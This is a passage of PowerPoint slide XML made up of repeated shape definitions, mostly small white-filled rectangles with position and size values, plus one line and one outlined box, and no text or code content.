          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842000" y="1514160"/>
            <a:ext cx="6120" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="CustomShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4869000" y="1503000"/>
            <a:ext cx="23400" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="CustomShape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4897440" y="1504440"/>
            <a:ext cx="21960" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="CustomShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4924440" y="1504440"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="CustomShape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950000" y="1504440"/>
            <a:ext cx="39240" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="CustomShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995720" y="1504440"/>
            <a:ext cx="34560" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="CustomShape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5033880" y="1504440"/>
            <a:ext cx="28080" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="CustomShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664160" y="1348920"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="CustomShape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695840" y="1348920"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="CustomShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4727520" y="1348920"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="CustomShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759200" y="1348920"/>
            <a:ext cx="4320" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="CustomShape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770360" y="1345680"/>
            <a:ext cx="42480" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="CustomShape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821120" y="1348920"/>
            <a:ext cx="33120" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="CustomShape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862520" y="1358640"/>
            <a:ext cx="7560" cy="29880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="CustomShape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890960" y="1348920"/>
            <a:ext cx="20160" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="CustomShape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921200" y="1348920"/>
            <a:ext cx="26640" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="CustomShape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956120" y="1348920"/>
            <a:ext cx="33120" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="CustomShape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018040" y="1348920"/>
            <a:ext cx="9000" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="CustomShape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5043600" y="1345680"/>
            <a:ext cx="25200" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="CustomShape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087880" y="1371240"/>
            <a:ext cx="15480" cy="2880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="CustomShape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5122800" y="1345680"/>
            <a:ext cx="21960" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="CustomShape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5153040" y="1348920"/>
            <a:ext cx="21960" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="CustomShape 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5184720" y="1348920"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="CustomShape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235480" y="1348920"/>
            <a:ext cx="9000" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="CustomShape 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262480" y="1348920"/>
            <a:ext cx="25200" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Line 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295680" y="1659960"/>
            <a:ext cx="2009880" cy="2009880"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6480">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="CustomShape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8380440" y="3726000"/>
            <a:ext cx="3038040" cy="1611000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="CustomShape 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315280" y="3713040"/>
            <a:ext cx="140760" cy="139320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="CustomShape 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647200" y="4971960"/>
            <a:ext cx="149040" cy="120240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="CustomShape 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9158400" y="4352760"/>
            <a:ext cx="97920" cy="97920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="CustomShape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8650440" y="4356000"/>
            <a:ext cx="604440" cy="732960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="CustomShape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8650440" y="4356000"/>
            <a:ext cx="55080" cy="56880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="CustomShape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8910720" y="5027760"/>
            <a:ext cx="340920" cy="61560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="CustomShape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8945640" y="5045040"/>
            <a:ext cx="306000" cy="43920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="CustomShape 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8771040" y="4746600"/>
            <a:ext cx="37800" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="CustomShape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8818560" y="4745160"/>
            <a:ext cx="53640" cy="52200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="CustomShape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8901000" y="4746600"/>
            <a:ext cx="33120" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="CustomShape 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943840" y="4746600"/>
            <a:ext cx="33120" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="CustomShape 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8989920" y="4745160"/>
            <a:ext cx="52200" cy="52200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="CustomShape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9047160" y="4746600"/>
            <a:ext cx="26640" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="CustomShape 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078840" y="4745160"/>
            <a:ext cx="53640" cy="52200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="CustomShape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8745480" y="4741920"/>
            <a:ext cx="7560" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="CustomShape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8745480" y="4792680"/>
            <a:ext cx="7560" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="CustomShape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="4741920"/>
            <a:ext cx="6120" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="CustomShape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="4792680"/>
            <a:ext cx="6120" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="CustomShape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748720" y="4519440"/>
            <a:ext cx="48960" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="CustomShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8812080" y="4519440"/>
            <a:ext cx="47160" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="CustomShape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872560" y="4518000"/>
            <a:ext cx="78840" cy="78840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="CustomShape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8966160" y="4519440"/>
            <a:ext cx="39240" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="CustomShape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016920" y="4519440"/>
            <a:ext cx="7560" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="CustomShape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9042480" y="4519440"/>
            <a:ext cx="36000" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="CustomShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9091440" y="4519440"/>
            <a:ext cx="42480" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="CustomShape 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8747280" y="4624560"/>
            <a:ext cx="48960" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="CustomShape 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802720" y="4624560"/>
            <a:ext cx="50400" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="CustomShape 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8862840" y="4624560"/>
            <a:ext cx="47160" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="CustomShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
